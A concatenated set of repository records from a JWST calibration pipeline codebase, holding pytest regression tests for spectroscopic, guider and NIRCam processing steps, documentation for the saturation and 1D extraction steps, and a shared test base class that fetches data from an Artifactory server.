Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(asn_file)\n\n outputs = [('test_lrs1_bsub.fits', 'test_lrs1_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs2_bsub.fits','test_lrs2_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs3_bsub.fits','test_lrs3_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs4_bsub.fits','test_lrs4_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs1_cal.fits', 'test_lrs1_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs2_cal.fits', 'test_lrs2_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs3_cal.fits', 'test_lrs3_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs4_cal.fits', 'test_lrs4_cal_ref.fits',\n ['primary','sci','err','dq'])\n ]\n self.compare_outputs(outputs)\n\n def test_miri_lrs_slit_1(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on a single\n MIRI LRS fixed-slit exposure.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_MIRIMAGE_rate.fits')\n\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw00035001001_01101_00001_MIRIMAGE_cal.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw00035001001_01101_00001_MIRIMAGE_x1d.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n\n def test_miri_lrs_slit_1b(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on a single\n MIRI LRS fixed-slit exposure with multiple integrations. Compare _calints.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_MIRIMAGE_rateints.fits')\n\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw00035001001_01101_00001_MIRIMAGE_calints.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_calints_ref.fits',\n ['primary','sci','err','dq']),\n ('jw00035001001_01101_00001_MIRIMAGE_x1dints.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_x1dints_ref.fits',\n ['primary', ('extract1d', 1), ('extract1d', 2), ('extract1d', 3), ('extract1d', 4)]\n )\n ]\n self.compare_outputs(outputs)\n\n def test_mrs2pipeline1(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on MIRI MRS data.\n\n \"\"\"\n test_dir = 'test_mrs2pipeline'\n self.ref_loc = ['test_mrs2pipeline', 'truth']\n\n input_file = self.get_data(test_dir,\n 'jw80500018001_02101_00002_MIRIFUSHORT_rate.fits')\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw80500018001_02101_00002_MIRIFUSHORT_cal.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw80500018001_02101_00002_MIRIFUSHORT_s3d.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']),\n ('jw80500018001_02101_00002_MIRIFUSHORT_x1d.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n\n def test_mrs_spec2(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on MIRI MRS data.\n\n \"\"\"\n self.rtol = 0.000001\n input_file = self.get_data(self.test_dir,\n 'jw10001001001_01101_00001_mirifushort_rate.fits')\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw10001001001_01101_00001_mirifushort_cal.fits',\n 'jw10001001001_01101_00001_mirifushort_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw10001001001_01101_00001_mirifushort_s3d.fits',\n 'jw10001001001_01101_00001_mirifushort_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']),\n ('jw10001001001_01101_00001_mirifushort_x1d.fits',\n 'jw10001001001_01101_00001_mirifushort_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.47878268361091614, "alphanum_fraction": 0.567509651184082, "avg_line_length": 31.859155654907227, "blob_id": "23de18d020f15fe24dcd19bb09b7180e18bab111", "content_id": "8c30aabb6c7b1bbb3b73789ed237aadf9616c6e2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2333, "license_type": "permissive", "max_line_length": 87, "num_lines": 71, "path": "/jwst/tests_nightly/general/fgs/test_guider_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.calwebb_guider import GuiderPipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestGuiderPipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_guiderpipeline', 'truth']\n test_dir = 'test_guiderpipeline'\n\n rtol = 0.000001\n\n def test_guider_pipeline1(self):\n \"\"\"\n Regression test of calwebb_guider pipeline performed on ID-image data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw88600073001_gs-id_7_image-uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw88600073001_gs-id_7_image-cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw88600073001_gs-id_7_image-cal.fits',\n 'jw88600073001_gs-id_7_image-cal_ref.fits',\n ['primary','sci','dq'])\n ]\n self.compare_outputs(outputs)\n\n\n def test_guider_pipeline2(self):\n \"\"\"\n Regression test of calwebb_guider pipeline performed on ACQ-1 data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw88600073001_gs-acq1_2016022183837_uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw88600073001_gs-acq1_2016022183837_cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw88600073001_gs-acq1_2016022183837_cal.fits',\n 'jw88600073001_gs-acq1_2016022183837_cal_ref.fits',\n ['primary','sci','dq'])\n\n ]\n self.compare_outputs(outputs)\n\n\n def test_guider_pipeline3(self):\n \"\"\"\n\n Regression test of calwebb_guider pipeline performed on ID STACKED data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw86600004001_gs-id_1_stacked-uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw86600004001_gs-id_1_stacked-cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw86600004001_gs-id_1_stacked-cal.fits',\n 'jw86600004001_gs-id_1_stacked-cal_ref.fits',\n ['primary','sci','dq'])\n\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.40420928597450256, "alphanum_fraction": 0.4931156635284424, "avg_line_length": 43.99114990234375, "blob_id": "513dcddf7d489f5627a601ae08d70a6e735bfc4d", "content_id": "97f9c9714d29cef6be2350461563abb225e5c619", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5084, "license_type": "permissive", "max_line_length": 87, "num_lines": 113, "path": "/jwst/tests_nightly/general/nircam/test_nircam_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.ipc import IPCStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.persistence import PersistenceStep\nfrom jwst.photom import PhotomStep\nfrom jwst.saturation import SaturationStep\n\n\n# Parameterized regression tests for NIRCAM processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRCamSteps(BaseJWSTTestSteps):\n input_loc = 'nircam'\n\n params = {'test_steps':\n [dict(input='jw00017001001_01101_00001_NRCA1_dq_init.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(odd_even_columns=True,\n use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00017001001_01101_00001_NRCA1_bias_drift.fits',\n output_hdus=[],\n id='refpix_nircam'\n\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_saturation.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_dark_current.fits',\n output_hdus=[],\n id='dark_current_nircam'\n\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_dq_init.fits',\n output_hdus=[],\n id='dq_init_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_ramp_fit.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_flat_field.fits',\n output_hdus=[],\n id='flat_field_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA3_uncal.fits',\n test_dir='test_ipc_step',\n step_class=IPCStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA3_ipc.fits',\n output_hdus=['primary', 'sci'],\n id='ipc_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=25.0),\n output_truth='jw00017001001_01101_00001_NRCA1_jump.fits',\n output_hdus=[],\n id='jump_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_linearity.fits',\n output_hdus=[],\n id='linearity_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_ramp.fits',\n test_dir='test_persistence',\n step_class=PersistenceStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_persistence.fits',\n output_hdus=[],\n id='persistence_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_emission.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_photom.fits',\n output_hdus=[],\n id='photom_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_saturation.fits',\n output_hdus=[],\n id='saturation_nircam'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.7882583141326904, "alphanum_fraction": 0.7917808294296265, "avg_line_length": 51.14285659790039, "blob_id": "4d34a6ddfe582c0b08081483c79ed6bdf6046896", "content_id": "fdf37b2ac3b63363b0f504a5d98362d1b22710f7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2555, "license_type": "permissive", "max_line_length": 93, "num_lines": 49, "path": "/docs/jwst/saturation/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n============\n\nThe ``saturation`` step flags saturated pixel values. It loops over all\nintegrations within an exposure, examining each one group-by-group, comparing the\npixel values in the SCI array with defined saturation thresholds for each pixel.\nWhen it finds a pixel value in a given group that is above the threshold, it\nsets the \"SATURATED\" flag in the corresponding location of the \"GROUPDQ\"\narray in the science exposure. It also flags all subsequent groups for that\npixel as saturated. For example, if there are 10 groups in an integration and\ngroup 7 is the first one to cross the saturation threshold for a given pixel,\nthen groups 7 through 10 will all be flagged for that pixel.\n\nNIRSpec data acquired using the \"IRS2\" readout pattern require special\nhandling in this step, due to the extra reference pixel values that are interleaved\nwithin the science data. The saturation reference file data does not contain\nextra entries for these pixels. The step-by-step process is as follows:\n\n- Retrieve and load data from the appropriate \"SATURATION\" reference file from CRDS\n\n- If the input science exposure used the NIRSpec IRS2 readout pattern:\n\n * Create a temporary saturation array that is the same size as the IRS2 readout\n\n * Copy the saturation threshold values from the original reference data into\n the larger saturation array, skipping over the interleaved reference pixel\n locations within the array\n\n- If the input science exposure used a subarray readout, extract the matching\n subarray from the full-frame saturation reference file data\n\n- For pixels that contain NaN in the reference file saturation threshold array\n or are flagged in the reference file with \"NO_SAT_CHECK\" (no saturation check\n available), propagate the \"NO_SAT_CHECK\" flag to the science data PIXELDQ array\n\n- For each group in the input science data, set the \"SATURATION\" flag in the\n \"GROUPDQ\" array if the pixel value is greater than or equal to the saturation\n threshold from the reference file\n\nNote that pixels set to NaN or flagged as \"NO_SAT_CHECK\" in the saturation\nreference file do not receive any saturation checking by this step. They are\nsimply flagged as \"NO_SAT_CHECK\" in the output science data.\n\nSubarrays\n=========\nThe ``saturation`` step will accept either full-frame or subarray saturation reference files.\nIf only a full-frame reference file is available, the step will extract a\nsubarray to match that of the science exposure. Otherwise, subarray-specific\nsaturation reference files will be used if they are available.\n" }, { "alpha_fraction": 0.50157231092453, "alphanum_fraction": 0.5927672982215881, "avg_line_length": 36.411766052246094, "blob_id": "ad9bd7215ed89ab10125069541212a93e500fdfb", "content_id": "b9746a1cbb51f5a4a6a556fa90d4833f76ef37f1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "permissive", "max_line_length": 82, "num_lines": 34, "path": "/jwst/tests_nightly/general/nircam/test_image2pipeline_2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Image2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline2_cal(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on NIRCam data.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw82500001003_02101_00001_NRCALONG_rate.fits')\n output_file = 'jw82500001003_02101_00001_NRCALONG_cal.fits'\n\n collect_pipeline_cfgs('cfgs')\n Image2Pipeline.call(input_file,\n config_file='cfgs/calwebb_image2.cfg',\n output_file=output_file)\n\n outputs = [(output_file,\n 'jw82500001003_02101_00001_NRCALONG_cal_ref.fits',\n ['primary','sci','err','dq','area']),\n ('jw82500001003_02101_00001_NRCALONG_i2d.fits',\n 'jw82500001003_02101_00001_NRCALONG_i2d_ref.fits',\n ['primary','sci','con','wht'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.7838507294654846, "alphanum_fraction": 0.7888044714927673, "avg_line_length": 57.79611587524414, "blob_id": "aa4c585ab6bac013035f1dde63b16337b555efe8", "content_id": "bc350409069925a99a64b37df821ad398dd9a168", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6056, "license_type": "permissive", "max_line_length": 84, "num_lines": 103, "path": "/docs/jwst/extract_1d/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n===========\nThe ``extract_1d`` step extracts a 1D signal from a 2D or 3D dataset and\nwrites a spectrum to a product. This works on all JWST spectroscopic\nmodes, including MIRI LRS (slit and slitless) and MRS, NIRCam WFSS and\nTSGRISM, NIRISS WFSS and SOSS, and NIRSpec fixed-slit, IFU, and MOS.\n\nAn EXTRACT1D reference file is used for most modes to specify the location and\nsize of the target and background extraction apertures.\nThe EXTRACT1D reference file is not used for Wide-Field Slitless Spectroscopy data\n(NIS_WFSS or NRC_WFSS). The extraction region is instead taken to be the full size\nof the input subarray or cutout, or restricted to the region within which the world\ncoordinate system (WCS) is defined.\n\nFor IFU data, the extraction options differ depending on\nwhether the target is a point source or an extended source. For a point\nsource, the spectrum is extracted using circular aperture photometry,\noptionally including background subtraction using a circular annulus.\nFor an extended source, rectangular aperture photometry is used, with\nthe entire image being extracted, and no background subtraction, regardless\nof what was specified in the reference file or command-line arguments.\nFor either point source or extended, the photometry makes use of astropy photutils.\nThe region of overlap between an aperture and a pixel can be calculated by\none of three different methods: \"exact\", limited only by finite precision\narithmetic; \"center\", i.e. the full value in a pixel will be included if its\ncenter is within the aperture; or \"subsample\", which means pixels will be\nsubsampled N x N, and the \"center\" option will be used for each sub-pixel.\n\nFor most spectral modes an aperture correction will be applied to the extracted\n1D spectral data (unless otherwise selected by the user), in order to put the\nresults onto an infinite aperture scale.\nThis is done by creating interpolation functions based on the APCORR reference\nfile data and applying the interpolated aperture correction (a multiplicative\nfactor between 0 and 1) to the extracted, 1D spectral data (corrected data\ninclude the \"flux\", \"surf_bright\", \"error\", and \"sb_error\" columns in the output\ntable).\n\nInput\n-----\nCalibrated and potentially resampled 2D images or 3D cubes. The format should be a\nCubeModel, SlitModel, IFUCubeModel, ImageModel, MultiSlitModel, or a ModelContainer.\nFor some JWST modes this is usually a resampled product, such as the \"i2d\" products\nfor MIRI LRS fixed-slit, NIRSpec fixed-slit, and NIRSpec MOS, or the \"s3d\" products\nfor MIRI MRS and NIRSpec IFU. For other modes that are not resampled (e.g. MIRI\nLRS slitless, NIRISS SOSS, NIRSpec BrightObj, and NIRCam and NIRISS WFSS), this will\nbe a \"cal\" product.\nFor modes that have multiple slit instances (NIRSpec fixed-slit and MOS, WFSS),\nThe SCI extensions should have keyword SLTNAME to specify which slit was extracted,\nthough if there is only one slit (e.g. MIRI LRS and NIRISS SOSS), the slit name can\nbe taken from the EXTRACT1D reference file instead.\n\nNormally the :ref:`photom <photom_step>` step should have been run before running\n``extract_1d``. If ``photom`` has not been run, a warning will be logged and the\noutput of ``extract_1d`` will be in units of count rate. The ``photom`` step\nconverts data to units of either surface brightness (MegaJanskys per steradian) or,\nfor point sources observed with NIRSpec and NIRISS SOSS, units of flux density\n(MegaJanskys).\n\nOutput\n------\nThe output will be in MultiSpecModel format. For each input slit there will\nbe an output table extension with the name EXTRACT1D. This extension will\nhave columns WAVELENGTH, FLUX, ERROR, SURF_BRIGHT, SB_ERROR, DQ,\nBACKGROUND, BERROR and NPIXELS.\nSome metadata will be written to the table header, mostly copied from the\ninput header.\n\nThe output WAVELENGTH data is copied from the wavelength array of the input 2D data,\nif that attribute exists and was populated, otherwise it is calculated from the WCS.\nFLUX is the flux density in Janskys; see keyword TUNIT2 if the data are\nin a FITS BINTABLE. ERROR is the error estimate for FLUX, and it has the\nsame units as FLUX.\nSURF_BRIGHT is the surface brightness in MJy / sr, except that for point\nsources observed with NIRSpec and NIRISS SOSS, SURF_BRIGHT will be set to\nzero, because there's no way to express the extracted results from those modes\nas a surface brightness. SB_ERROR is the error estimate for SURF_BRIGHT.\nWhile it's expected that a user will make use of the FLUX column for\npoint-source data and the SURF_BRIGHT column for an extended source,\nboth columns are populated (except for NIRSpec and NIRISS SOSS point sources,\nas mentioned above).\nThe ``extract_1d`` step collapses the input data from 2-D to 1-D by summing\none or more rows (or columns, depending on the dispersion direction).\nA background may optionally be subtracted, but\nthere are also other options for background subtraction prior to ``extract_1d``.\nFor the case of input data in units of MJy / sr, the SURF_BRIGHT\nand BACKGROUND columns are\npopulated by dividing the sum by the number of pixels (see the NPIXELS column,\ndescribed below) that were added together. The FLUX column is populated\nby multiplying the sum by the solid angle of a pixel, and also multiplying\nby 10^6 to convert from MJy to Jy.\nFor the case of input data in units of MJy (i.e. point sources,\nNIRSpec or NIRISS SOSS), the SURF_BRIGHT column is set to zero, the\nFLUX column is just multiplied by 10^6, and the BACKGROUND column is\ndivided by NPIXELS and by the solid angle of a pixel to convert to surface\nbrightness (MJy / sr).\n\nNPIXELS is the number of pixels that were added together for the source\nextraction region. Note that this is not necessarily a constant, and\nthe value is not necessarily an integer (the data type is float).\nBACKGROUND is the measured background, scaled to the extraction width used\nfor FLUX and SURF_BRIGHT. BACKGROUND will be zero if background subtraction\nis not requested.\nERROR, SB_ERROR, BERROR, and DQ are not populated with useful values yet.\n" }, { "alpha_fraction": 0.5736891031265259, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 29.167247772216797, "blob_id": "808aa96b715e5c9b22fa2f2f9bcca6385c36a673", "content_id": "df34e09e202a6fd813f0c451cc3ad2db4e1307bc", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8658, "license_type": "permissive", "max_line_length": 88, "num_lines": 287, "path": "/jwst/tests/base_classes.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from glob import glob as _sys_glob\nimport os\nfrom os import path as op\nfrom pathlib import Path\nimport sys\nimport pytest\nimport requests\n\nfrom ci_watson.artifactory_helpers import (\n BigdataError,\n check_url,\n get_bigdata,\n get_bigdata_root,\n)\nfrom .compare_outputs import compare_outputs\n\nfrom jwst.associations import load_asn\n\n__all__ = [\n 'BaseJWSTTest',\n]\n\n# Define location of default Artifactory API key, for Jenkins use only\nARTIFACTORY_API_KEY_FILE = '/eng/ssb2/keys/svc_rodata.key'\n\n\[email protected]('_jail')\[email protected]\nclass BaseJWSTTest:\n '''\n Base test class from which to derive JWST regression tests\n '''\n rtol = 0.00001\n atol = 0\n\n input_loc = '' # root directory for 'input' files\n ref_loc = [] # root path for 'truth' files: ['test1','truth'] or ['test3']\n\n ignore_table_keywords = []\n ignore_fields = []\n ignore_hdus = ['ASDF']\n ignore_keywords = ['DATE', 'CAL_VER', 'CAL_VCS', 'CRDS_VER', 'CRDS_CTX', 'FILENAME']\n\n @pytest.fixture(autouse=True)\n def config_env(self, pytestconfig, envopt):\n self.env = pytestconfig.getoption('env')\n\n @pytest.fixture(autouse=True)\n def config_access(self, pytestconfig):\n self.inputs_root = pytestconfig.getini('inputs_root')[0]\n self.results_root = pytestconfig.getini('results_root')[0]\n\n @property\n def repo_path(self):\n return [self.inputs_root, self.env, self.input_loc]\n\n def get_data(self, *pathargs, docopy=True):\n \"\"\"\n Download `filename` into working directory using\n `artifactory_helpers/get_bigdata()`.\n This will then return the full path to the local copy of the file.\n \"\"\"\n local_file = get_bigdata(*self.repo_path, *pathargs, docopy=docopy)\n return local_file\n\n def compare_outputs(self, outputs, raise_error=True, **kwargs):\n\n # Parse any user-specified kwargs\n ignore_keywords = kwargs.get('ignore_keywords', self.ignore_keywords)\n ignore_hdus = kwargs.get('ignore_hdus', self.ignore_hdus)\n ignore_fields = kwargs.get('ignore_fields', self.ignore_fields)\n rtol = kwargs.get('rtol', self.rtol)\n atol = kwargs.get('atol', self.atol)\n\n compare_kws = dict(ignore_fields=ignore_fields, ignore_hdus=ignore_hdus,\n ignore_keywords=ignore_keywords,\n rtol=rtol, atol=atol)\n\n input_path = [self.inputs_root, self.env, self.input_loc, *self.ref_loc]\n\n return compare_outputs(outputs,\n input_path=input_path,\n docopy=True,\n results_root=self.results_root,\n **compare_kws)\n\n def data_glob(self, *pathargs, glob='*'):\n \"\"\"Retrieve file list matching glob\n\n Parameters\n ----------\n pathargs: (str[, ...])\n Path components\n\n glob: str\n The file name match criterion\n\n Returns\n -------\n file_paths: [str[, ...]]\n File paths that match the glob criterion.\n Note that the TEST_BIGDATA and `repo_path`\n roots are removed so these results can be fed\n back into `get_data()`\n \"\"\"\n\n # Get full path and proceed depending on whether\n # is a local path or URL.\n root = get_bigdata_root()\n if op.exists(root):\n path = op.join(root, *self.repo_path)\n root_len = len(path) + 1\n path = op.join(path, *pathargs)\n file_paths = _data_glob_local(path, glob)\n elif check_url(root):\n root_len = len(op.join(*self.repo_path[1:])) + 1\n path = op.join(*self.repo_path, *pathargs)\n file_paths = _data_glob_url(path, glob, root=root)\n else:\n raise BigdataError('Path cannot be found: {}'.format(path))\n\n # Remove the root from the paths\n file_paths = [\n file_path[root_len:]\n for file_path in file_paths\n ]\n return file_paths\n\n\n# Pytest function to support the parameterization of BaseJWSTTestSteps\ndef pytest_generate_tests(metafunc):\n # called once per each test function\n funcarglist = metafunc.cls.params[metafunc.function.__name__]\n argnames = sorted(funcarglist[0])\n idlist = [funcargs['id'] for funcargs in funcarglist]\n del argnames[argnames.index('id')]\n metafunc.parametrize(argnames, [[funcargs[name] for name in argnames]\n for funcargs in funcarglist], ids=idlist)\n\n\nclass BaseJWSTTestSteps(BaseJWSTTest):\n\n params = {'test_steps':[dict(input=\"\",\n test_dir=None,\n step_class=None,\n step_pars=dict(),\n output_truth=\"\",\n output_hdus=[])\n ]\n }\n\n def test_steps(self, input, test_dir, step_class, step_pars,\n output_truth, output_hdus):\n \"\"\"\n Template method for parameterizing all the tests of JWST pipeline\n processing steps.\n \"\"\"\n\n if test_dir is None:\n return\n\n self.test_dir = test_dir\n self.ref_loc = [self.test_dir, 'truth']\n\n # can be removed once all truth files have been updated\n self.ignore_keywords += ['FILENAME']\n\n input_file = self.get_data(self.test_dir, input)\n result = step_class.call(input_file, save_results=True, **step_pars)\n\n output_file = result.meta.filename\n result.close()\n\n output_pars = None\n if isinstance(output_truth, tuple):\n output_pars = output_truth[1]\n output_truth = output_truth[0]\n\n if not output_pars:\n if output_hdus:\n output_spec = (output_file, output_truth, output_hdus)\n else:\n output_spec = (output_file, output_truth)\n else:\n output_spec = {'files':(output_file, output_truth),\n 'pars':output_pars}\n outputs = [output_spec]\n self.compare_outputs(outputs)\n\n\ndef raw_from_asn(asn_file):\n \"\"\"\n Return a list of all input files from a given association.\n\n Parameters\n ----------\n asn_file : str\n Filename for the ASN file.\n\n Returns\n -------\n members : list of str\n A list of all input files in the association\n\n \"\"\"\n\n members = []\n with open(asn_file) as f:\n asn = load_asn(f)\n\n for product in asn['products']:\n for member in product['members']:\n members.append(member['expname'])\n\n return members\n\n\ndef _data_glob_local(*glob_parts):\n \"\"\"Perform a glob on the local path\n\n Parameters\n ----------\n glob_parts: (path-like,[...])\n List of components that will be built into a single path\n\n Returns\n -------\n file_paths: [str[, ...]]\n Full file paths that match the glob criterion\n \"\"\"\n full_glob = Path().joinpath(*glob_parts)\n return _sys_glob(str(full_glob))\n\n\ndef _data_glob_url(*url_parts, root=None):\n \"\"\"\n Parameters\n ----------\n url: (str[,...])\n List of components that will be used to create a URL path\n\n root: str\n The root server path to the Artifactory server.\n Normally retrieved from `get_bigdata_root`.\n\n Returns\n -------\n url_paths: [str[, ...]]\n Full URLS that match the glob criterion\n \"\"\"\n # Fix root root-ed-ness\n if root.endswith('/'):\n root = root[:-1]\n\n # Access\n try:\n envkey = os.environ['API_KEY_FILE']\n except KeyError:\n envkey = ARTIFACTORY_API_KEY_FILE\n\n try:\n with open(envkey) as fp:\n headers = {'X-JFrog-Art-Api': fp.readline().strip()}\n except (PermissionError, FileNotFoundError):\n print(\"Warning: Anonymous Artifactory search requests are limited to \"\n \"1000 results. Use an API key and define API_KEY_FILE environment \"\n \"variable to get full search results.\", file=sys.stderr)\n headers = None\n\n search_url = '/'.join([root, 'api/search/pattern'])\n\n # Join and re-split the url so that every component is identified.\n url = '/'.join([root] + [idx for idx in url_parts])\n all_parts = url.split('/')\n\n # Pick out \"jwst-pipeline\", the repo name\n repo = all_parts[4]\n\n # Format the pattern\n pattern = repo + ':' + '/'.join(all_parts[5:])\n\n # Make the query\n params = {'pattern': pattern}\n with requests.get(search_url, params=params, headers=headers) as r:\n url_paths = r.json()['files']\n\n return url_paths\n" }, { "alpha_fraction": 0.6125592589378357, "alphanum_fraction": 0.6255924105644226, "avg_line_length": 25.375, "blob_id": "2d4ff742931195bac1d407b41791d012669bf1dc", "content_id": "f29bda99c5c6343be43a9259a89b5c5555fa2ad5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "permissive", "max_line_length": 67, "num_lines": 32, "path": "/jwst/master_background/tests/test_nirspec_corrections.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nUnit tests for master background NIRSpec corrections\n\"\"\"\nimport numpy as np\n\nfrom jwst import datamodels\nfrom ..nirspec_corrections import correct_nrs_ifu_bkg\n\n\ndef test_ifu_pathloss_existence():\n \"\"\"Test the case where the input is missing a pathloss array\"\"\"\n\n input = datamodels.IFUImageModel((10, 10))\n result = correct_nrs_ifu_bkg(input)\n\n assert (result == input)\n\n\ndef test_ifu_correction():\n \"\"\"Test application of IFU corrections\"\"\"\n\n data = np.ones((5, 5))\n pl_ps = 2 * data\n pl_un = data / 2\n input = datamodels.IFUImageModel(data=data,\n pathloss_point=pl_ps,\n pathloss_uniform=pl_un)\n\n corrected = input.data * pl_ps / pl_un\n result = correct_nrs_ifu_bkg(input)\n\n assert np.allclose(corrected, result.data, rtol=1.e-10)\n" }, { "alpha_fraction": 0.4971887469291687, "alphanum_fraction": 0.5165327787399292, "avg_line_length": 30.855010986328125, "blob_id": "054d6607f5b206cf0bc3d9de4307c1e0c4af8d39", "content_id": "45b5074a85b0a31f1b40b791535dc63042baef43", "detected_licenses": [ "BSD-2-Clause" ], 